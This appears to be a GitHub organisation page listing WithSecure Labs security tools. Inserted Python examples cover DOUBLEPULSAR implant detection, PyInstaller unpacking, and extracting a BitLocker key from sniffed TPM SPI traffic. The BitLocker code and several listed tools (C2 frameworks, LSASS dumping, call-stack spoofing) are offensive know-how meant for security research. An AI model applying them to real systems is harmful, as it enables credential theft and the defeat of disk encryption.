WithSecure Labs
Welcome to WithSecure Labs. Here we publish research, and share our tools with the security community.
Pinned Repositories
awspx
A graph-based tool for visualizing effective access and resource relationships in AWS environments.
C3
Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
CallStackSpoofer
A PoC implementation for spoofing arbitrary call stacks when making syscalls (e.g. grabbing a handle via NtOpenProcess).
chainsaw
Rapidly Search and Hunt through Windows Forensic Artefacts
doublepulsar-detection-script
A Python 2 script for sweeping a network to find Windows systems compromised with the DOUBLEPULSAR implant.
drozer
The Leading Security Assessment Framework for Android.
leonidas
Automated Attack Simulation in the Cloud, complete with detection use cases.
needle
The iOS Security Testing Framework
physmem2profit
Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely.
python-exe-unpacker
A helper script for unpacking and decompiling EXEs compiled from python code.
WithSecure Labs' Repositories
WithSecureLabs/needle
The iOS Security Testing Framework
WithSecureLabs/doublepulsar-detection-script
A Python 2 script for sweeping a network to find Windows systems compromised with the DOUBLEPULSAR implant.
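The sweep relies on one protocol quirk of the SMB variant of the implant: a Trans2 SESSION_SETUP probe sent with Multiplex ID 0x41 is answered by an infected host with MID 0x51. The following is an added example, not code from the doublepulsar-detection-script repository: it parses the SMB1 header of a response, applies that check, and runs a sweep over a caller-supplied transport so the classifier can be exercised offline on constructed responses (the real script builds and sends the probe itself over TCP/445).

```python
# Added example (not the repository's own code). send_probe() in sweep() is an
# assumed callable that hides the network transport; build_trans2_response()
# produces constructed test packets, not captured traffic.
import struct
from typing import Callable, Dict, Optional

SMB1_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
PROBE_MID = 0x41        # MID placed in the Trans2 probe request
IMPLANT_MID = 0x51      # MID a DOUBLEPULSAR-infected host echoes back
NETBIOS_HDR = 4         # NetBIOS session header that precedes every SMB1 packet
SMB1_HDR_FMT = "<4sBIBHH8sHHHHH"   # 32-byte SMB1 header, little-endian fields


def parse_smb1_header(packet: bytes) -> dict:
    """Return the SMB1 header fields of a NetBIOS-framed response.

    Layout after the 4-byte NetBIOS header: protocol(4), command(1), status(4),
    flags(1), flags2(2), pid_high(2), signature(8), reserved(2), tid(2),
    pid_low(2), uid(2), mid(2).
    """
    if len(packet) < NETBIOS_HDR + struct.calcsize(SMB1_HDR_FMT):
        raise ValueError("packet too short for a NetBIOS + SMB1 header")
    (proto, command, status, _flags, _flags2, _pid_high, signature, _reserved,
     tid, _pid_low, uid, mid) = struct.unpack_from(SMB1_HDR_FMT, packet, NETBIOS_HDR)
    if proto != SMB1_MAGIC:
        raise ValueError("not an SMB1 packet")
    return {"command": command, "status": status, "signature": signature,
            "tid": tid, "uid": uid, "mid": mid}


def is_doublepulsar_response(packet: bytes) -> bool:
    """True when a Trans2 response carries the implant's tell-tale MID."""
    try:
        hdr = parse_smb1_header(packet)
    except ValueError:
        return False
    return hdr["command"] == SMB_COM_TRANSACTION2 and hdr["mid"] == IMPLANT_MID


def sweep(hosts, send_probe: Callable[[str], Optional[bytes]]) -> Dict[str, str]:
    """Classify each host from the Trans2 response returned by send_probe(host).

    send_probe returns the raw response bytes, or None when the host did not
    answer (closed port, timeout, SMB1 disabled).
    """
    results = {}
    for host in hosts:
        resp = send_probe(host)
        if resp is None:
            results[host] = "no-response"
        elif is_doublepulsar_response(resp):
            results[host] = "DOUBLEPULSAR"
        else:
            results[host] = "clean"
    return results


def build_trans2_response(mid: int, signature: bytes = b"\0" * 8) -> bytes:
    """Constructed sample: a minimal Trans2 response with the given MID."""
    smb = struct.pack(SMB1_HDR_FMT, SMB1_MAGIC, SMB_COM_TRANSACTION2, 0, 0x98, 0xC807,
                      0, signature, 0, 0x0800, 0xFEFF, 0x0800, mid)
    smb += b"\x00" + b"\x00\x00"      # word count 0, byte count 0
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    # Constructed responses standing in for three hosts on the network.
    canned = {
        "10.0.0.5": build_trans2_response(IMPLANT_MID),   # "infected"
        "10.0.0.6": build_trans2_response(PROBE_MID),     # clean, echoes our MID
        "10.0.0.7": None,                                 # no answer on 445
    }
    print(sweep(canned, canned.get))
```

To use it against real hosts, supply a send_probe that opens TCP/445, performs the SMB1 negotiate, session setup and tree connect, sends the Trans2 SESSION_SETUP probe with MID 0x41 and returns the raw reply; unlike the original script the example does not ship those packets.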
WithSecureLabs/awspx
A graph-based tool for visualizing effective access and resource relationships in AWS environments.
WithSecureLabs/python-exe-unpacker
A helper script for unpacking and decompiling EXEs compiled from python code.
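"Unpacking" such an executable means walking the PyInstaller CArchive appended to it: a cookie at the tail of the file points at a table of contents whose entries locate the embedded (usually zlib-compressed) scripts, modules and data. The following is an added example, not code from the python-exe-unpacker repository; the layout constants follow the PyInstaller 2.1+ archive format, and build_sample_archive() constructs an in-memory stand-in for a real executable so the parser can be run offline.

```python
# Added example (not the repository's own code). The cookie and TOC formats
# are the PyInstaller CArchive layouts; the sample archive is constructed here.
import struct
import zlib

PYINST_MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8siiii64s"      # magic, package length, TOC offset, TOC length, python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)        # 88 bytes
TOC_ENTRY_FMT = "!iiiiBc"      # entry length, data offset, compressed size, uncompressed size, flag, type
TOC_ENTRY_SIZE = struct.calcsize(TOC_ENTRY_FMT)  # 18 bytes; the NUL-padded name follows
TYPE_NAMES = {b"s": "script", b"m": "module", b"M": "package", b"z": "pyz archive",
              b"b": "binary", b"x": "data", b"o": "runtime option"}


def find_cookie(blob: bytes) -> dict:
    """Locate the trailing cookie and derive where the package starts in the file."""
    pos = blob.rfind(PYINST_MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, blob, pos)
    # Archive offsets are relative to the start of the package, which ends with
    # the cookie; bytes after the cookie (e.g. a code signature) are ignored.
    return {"pkg_start": pos + COOKIE_SIZE - pkg_len, "toc_off": toc_off,
            "toc_len": toc_len, "pyver": pyver, "pylib": pylib.rstrip(b"\0").decode()}


def parse_toc(blob: bytes, pkg_start: int, toc_off: int, toc_len: int) -> list:
    """Read every TOC entry: fixed 18-byte header followed by the entry name."""
    entries, cur, end = [], pkg_start + toc_off, pkg_start + toc_off + toc_len
    while cur < end:
        entry_len, data_off, csize, usize, cflag, typ = struct.unpack_from(TOC_ENTRY_FMT, blob, cur)
        name = blob[cur + TOC_ENTRY_SIZE:cur + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "type": TYPE_NAMES.get(typ, typ.decode()), "offset": data_off,
                        "csize": csize, "usize": usize, "compressed": bool(cflag)})
        cur += entry_len
    return entries


def extract_entry(blob: bytes, pkg_start: int, entry: dict) -> bytes:
    """Return an entry's payload, inflating it when the TOC flags it as compressed."""
    start = pkg_start + entry["offset"]
    raw = blob[start:start + entry["csize"]]
    data = zlib.decompress(raw) if entry["compressed"] else raw
    if len(data) != entry["usize"]:
        raise ValueError(f"{entry['name']}: TOC says {entry['usize']} bytes, got {len(data)}")
    return data


def unpack(blob: bytes) -> dict:
    """Return {name: (type, payload)} for every TOC entry of a PyInstaller-built executable."""
    ck = find_cookie(blob)
    return {e["name"]: (e["type"], extract_entry(blob, ck["pkg_start"], e))
            for e in parse_toc(blob, ck["pkg_start"], ck["toc_off"], ck["toc_len"])}


def build_sample_archive(items, pyver=307, pylib=b"python37.dll") -> bytes:
    """Constructed test data: a minimal CArchive behind a fake PE stub.
    items: iterable of (name, one-byte type code, payload bytes, compress?)."""
    stub = b"MZ" + b"\0" * 62          # stands in for the bootloader executable
    data, toc = b"", b""
    for name, typ, payload, compress in items:
        stored = zlib.compress(payload, 9) if compress else payload
        name_bytes = name.encode() + b"\0"
        name_bytes += b"\0" * (-(TOC_ENTRY_SIZE + len(name_bytes)) % 16)   # entries are padded to 16 bytes
        toc += struct.pack(TOC_ENTRY_FMT, TOC_ENTRY_SIZE + len(name_bytes), len(data),
                           len(stored), len(payload), 1 if compress else 0, typ) + name_bytes
        data += stored
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, len(data), len(toc), pyver, pylib)
    return stub + data + toc + cookie


if __name__ == "__main__":
    sample = build_sample_archive([("main", b"s", b"print('hello')\n", True),
                                   ("config.txt", b"x", b"debug=0", False)])
    for name, (kind, payload) in unpack(sample).items():
        print(f"{name:12} {kind:8} {len(payload)} bytes")
```

Script entries ('s') come out as marshalled code objects in a real build, so decompilation is a second step on the extracted payload; this example stops at extraction. Entries with a 'z' type are nested PYZ archives with their own format, which the parser above does not descend into.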
WithSecureLabs/CallStackSpoofer
A PoC implementation for spoofing arbitrary call stacks when making syscalls (e.g. grabbing a handle via NtOpenProcess).
WithSecureLabs/physmem2profit
Physmem2profit can be used to create a minidump of a target host's LSASS process by analysing physical memory remotely.
WithSecureLabs/captcha22
CAPTCHA22 is a toolset for building, and training, CAPTCHA cracking models using neural networks.
WithSecureLabs/Jandroid
WithSecureLabs/bitlocker-spi-toolkit
Tools for decoding TPM SPI transactions and extracting the BitLocker key from them.
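The two steps the toolkit automates are decoding the 4-byte header that opens every TPM SPI transaction (TCG PTP FIFO interface) and scanning the bytes the TPM returns through its data FIFO for the key. The following is an added example, not code from bitlocker-spi-toolkit: register addresses and header encoding follow the PTP specification; VMK_HEADER is the 12-byte marker reported in public write-ups of this attack and is hard-coded here as an assumption to check against the toolkit's own value; the transaction list is constructed, not a logic-analyser capture.

```python
# Added example (not the toolkit's own code). VMK_HEADER is an assumed constant
# taken from public descriptions of the attack; sample_capture() builds a
# constructed list of transactions with simplified TPM2 response framing.

TPM_DATA_FIFO_0 = 0xD40024     # TPM_DATA_FIFO register, locality 0
TPM_STS_0 = 0xD40018           # TPM_STS register, locality 0 (polled between FIFO reads)
VMK_HEADER = bytes.fromhex("2c00000001000000" "03200000")   # assumption: marker preceding the key
VMK_LEN = 32                   # 256-bit volume master key follows the marker


def decode_spi_header(header: bytes):
    """Decode the 4 MOSI bytes that open a TPM SPI transaction.
    byte 0: bit 7 = 1 for read / 0 for write, bits 5..0 = transfer size - 1;
    bytes 1..3: 24-bit register address, big-endian.
    Returns (is_read, size, address)."""
    if len(header) != 4:
        raise ValueError("TPM SPI header is exactly 4 bytes")
    is_read = bool(header[0] & 0x80)
    size = (header[0] & 0x3F) + 1
    address = int.from_bytes(header[1:4], "big")
    return is_read, size, address


def fifo_read_stream(transactions) -> bytes:
    """Concatenate the MISO data of every read aimed at the data FIFO.
    transactions: iterable of (header bytes, MISO data bytes), already stripped
    of any wait-state bytes the TPM inserted after the header."""
    out = bytearray()
    for header, miso in transactions:
        is_read, size, address = decode_spi_header(header)
        if is_read and address == TPM_DATA_FIFO_0:
            out += miso[:size]
    return bytes(out)


def find_vmk(stream: bytes):
    """Return the 32-byte key that follows the marker, or None if absent/truncated."""
    idx = stream.find(VMK_HEADER)
    if idx < 0 or idx + len(VMK_HEADER) + VMK_LEN > len(stream):
        return None
    return stream[idx + len(VMK_HEADER):idx + len(VMK_HEADER) + VMK_LEN]


def read_header(address: int, size: int) -> bytes:
    """Build the MOSI header for a read of `size` bytes at `address`."""
    return bytes([0x80 | (size - 1)]) + address.to_bytes(3, "big")


def sample_capture(vmk: bytes):
    """Constructed capture: the unseal response leaves the TPM in 16-byte FIFO
    reads interleaved with STS polls, so the key straddles read boundaries."""
    blob = VMK_HEADER + vmk
    response = b"\x80\x01" + (10 + 2 + len(blob)).to_bytes(4, "big") + b"\x00\x00\x00\x00"  # tag, size, rc
    response += len(blob).to_bytes(2, "big") + blob   # TPM2B outData: 2-byte size, then the unsealed blob
    txns = []
    for i in range(0, len(response), 16):
        chunk = response[i:i + 16]
        txns.append((read_header(TPM_STS_0, 1), b"\x90"))                  # STS: stsValid | dataAvail
        txns.append((read_header(TPM_DATA_FIFO_0, len(chunk)), chunk))
    return txns


if __name__ == "__main__":
    key = find_vmk(fifo_read_stream(sample_capture(bytes(range(32)))))
    print(key.hex() if key else "no VMK found")
```

On a real capture the hard part is upstream of this code: recovering clean transactions from the SPI bit stream, including the wait states the TPM inserts on MISO after the header, which is what the toolkit's analyser does.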
WithSecureLabs/Jamf-Attack-Toolkit
Suite of tools to facilitate attacks against the Jamf macOS management platform.
WithSecureLabs/peas
PEAS is a Python 2 library and command-line application for running commands on an ActiveSync server, e.g. Microsoft Exchange.
WithSecureLabs/ppid-spoofing
Scripts for performing and detecting parent PID spoofing
WithSecureLabs/detectree
Data visualization for blue teams
WithSecureLabs/TickTock
WithSecureLabs/AMSIDetection
AMSI detection PoC
WithSecureLabs/ESFang
ESF modular ingestion tool for development and research.
WithSecureLabs/macOSTriageCollectionScript
A triage data collection script for macOS
WithSecureLabs/lazarus-sigma-rules
WithSecureLabs/RemotePSpy
RemotePSpy provides live monitoring of remote PowerShell sessions, which is particularly useful for older (pre-5.0) versions of PowerShell which do not have comprehensive logging facilities built in.
WithSecureLabs/FLAIR
F-Secure Lightweight Acquisition for Incident Response (FLAIR)
WithSecureLabs/mongo-rs
A higher-level wrapper on top of the official bson & mongodb crates.
WithSecureLabs/keywe-tooling
Tools that can be used to interact with the KeyWe Smart Lock device.
WithSecureLabs/usb-ninja-detection-poc
USB Ninja Detection PoC
WithSecureLabs/dreamer
Easier cloud infrastructure with Terraform and Ansible
WithSecureLabs/boops-boops-android-agent
WithSecureLabs/snake-tail
snake-tail: the command-line UI for snake
WithSecureLabs/boops-boops-docker-container
WithSecureLabs/Cue-COVID-Test_Research-Files
WithSecureLabs/prototype-pollution
WithSecureLabs/soccrates_adapters
Helpers for adapting data from Elements Vulnerability Management to be used in Soccrates EU project